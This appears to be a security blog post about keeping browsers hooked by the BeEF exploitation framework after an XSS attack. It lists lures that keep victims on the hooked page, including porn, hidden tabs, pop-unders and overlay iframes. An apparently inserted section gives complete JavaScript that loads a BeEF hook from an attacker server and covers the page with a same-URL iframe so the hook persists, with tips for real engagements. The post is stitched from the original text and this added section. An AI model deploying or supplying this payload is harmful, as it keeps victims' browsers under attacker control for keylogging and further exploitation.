Persistent BeEF
No, not that kind of beef!

“BeEF is a browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real-time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers.”
http://www.bindshell.net/tools/beef/
BeEF is a tool that turns a Cross-Site Scripting (XSS) finding into a real exploitation chain by providing a complete, easy-to-use framework around the injected hook. It currently sports Metasploit integration, keylogging, port scanning, Tor detection and many other cool features. You no longer have an excuse to fill your reports with ‘XSS’ pop-up boxes!
The original release of BeEF was written in PHP, while the current development version has been ported to good old Ruby (in case you didn’t know, Ruby is awesome). The Ruby version of BeEF, 0.4.1-alpha, was released last month and, when complete, will integrate other awesome XSS/browser exploitation tools such as Browser Rider, XSSShell and XSSTunnel.
The problem when exploiting XSS is that your payload only runs while the victim has the page containing it open: navigating away or closing the tab destroys the JavaScript execution context, and the BeEF hook dies with it. Most users get bored easily and will quickly browse to another page or close it before you have had the chance to launch your Meterpreter payload. I have spent the last couple of months thinking of different ways to keep the victim on our infected page, and over the past few days I have started asking how other people solved this problem.
Here are some of my own and other people’s suggestions, in no particular order. Thanks to my Twitter buddies and the BeEF mailing list for some of the following.
1. Pr0n (very effective if it is something out of the ordinary and the victim is a young male who is not at work; this was the most popular suggestion on Twitter)
2. A time-wasting video or game (I especially like this one, but more targeted ones may be more effective: http://www.youtube.com/watch?v=txz1VyVMy6g, video thanks to @redmeat_uk)
3. Open a new tab with the BeEF hook included (most people won’t even notice the new tab; thanks to Sussuro for the suggestion)
4. A pop-under ad (this is an awesome idea: https://secure.wikimedia.org/wikipedia/en/wiki/Pop-up_ad#Pop-under_ads, thanks to Vitaly Osipov from the BeEF mailing list)
5. A 100%x100% iframe that overlays the real page, so the victim keeps browsing inside the frame while the hooked top-level document stays open (the problem here being that the URL bar would stay static; thanks to Wade)
6. A Google (Mail) Gadget (if you’re like me, you are constantly logged into the Gmail web interface; the problem is that Google’s cache prevents the persistence, and after weeks of playing I have still yet to get this working. Here is one of my early attempts: http://pastie.org/private/v69ilhjyr8pcv3xtcq7nyq)
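As an added worked example of suggestions 3 and 5 above (this is not code from the BeEF project or from the original post), the payload below keeps a hook alive by covering the hooked page with a 100%x100% iframe of itself: the victim keeps browsing inside the frame while the top-level document, with the hook script in it, never unloads. The BeEF server address in HOOK_URL and the iframe id in FRAME_ID are assumed values. It also handles the one edge case that bites immediately in practice: the framed copy of the page carries the same injected payload (reflected XSS in the URL, or stored XSS on the page), so inside the frame the payload must do nothing, otherwise every frame spawns another frame.

```javascript
// Added example (not BeEF's own code): XSS persistence via a full-viewport
// iframe overlay. The hook stays in the top-level document; the victim
// browses the real site inside the frame.
const HOOK_URL = 'http://192.168.1.50:3000/hook.js'; // assumed BeEF hook URL
const FRAME_ID = 'x-persist';                         // assumed marker id

// `doc` and `win` are passed in (instead of using the globals directly) so
// the logic can be exercised outside a browser. Returns true when the
// overlay was installed, false when it was deliberately skipped.
function installPersistentOverlay(doc, win, hookUrl) {
  // Edge case 1: we are the framed copy of the page. Do nothing, or the
  // page would nest itself forever (and the victim would see nothing).
  if (win.top !== win.self) {
    return false;
  }
  // Edge case 2: idempotence, e.g. the payload got injected twice.
  if (doc.getElementById(FRAME_ID)) {
    return false;
  }

  // 1. Load (or re-load) the BeEF hook in the top-level document, which is
  //    the one that will now stay open for the rest of the session.
  const hook = doc.createElement('script');
  hook.src = hookUrl;
  doc.body.appendChild(hook);

  // 2. Cover the viewport with a frame of the very same URL. position:fixed
  //    plus the maximum z-index puts it above all page content; navigation
  //    from now on happens inside the frame, so the URL bar stays static.
  const frame = doc.createElement('iframe');
  frame.id = FRAME_ID;
  frame.src = win.location.href;
  frame.setAttribute('frameborder', '0');
  frame.style.cssText = [
    'position:fixed', 'top:0', 'left:0', 'width:100%', 'height:100%',
    'border:0', 'margin:0', 'padding:0', 'z-index:2147483647',
  ].join(';');
  doc.body.appendChild(frame);

  // 3. Hide the covered page's own scrollbar so the victim does not see
  //    two scrollbars, which is the usual giveaway of an overlay.
  doc.body.style.overflow = 'hidden';
  return true;
}

// Fire only when running inside a real browser; inert elsewhere.
if (typeof document !== 'undefined' && typeof window !== 'undefined') {
  installPersistentOverlay(document, window, HOOK_URL);
}
```

Two checks before relying on this in an engagement: the target must not send `X-Frame-Options: DENY` (SAMEORIGIN is fine, since the frame is same-origin), or the frame will render blank; and any link with `target="_top"` or a frame-busting script on the site will break out of the overlay and unload the hooked document, so walk through the victim's likely click paths first.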
So there are a couple of suggestions for getting yourself a persistent BeEF zombie. I was asked by one of the BeEF devs (Wade) to implement a persistence feature in BeEF itself; I will give it my best shot over the next month or so. In the meantime, what methods can you think of to keep a BeEF zombie persistent?



2 Responses to “Persistent BeEF”
miami home security systems
Very good post. Hope to see more excellent posts in the near future.
Ashish
Information about security tools and hacking tools http://www.securitytube-tools.net :D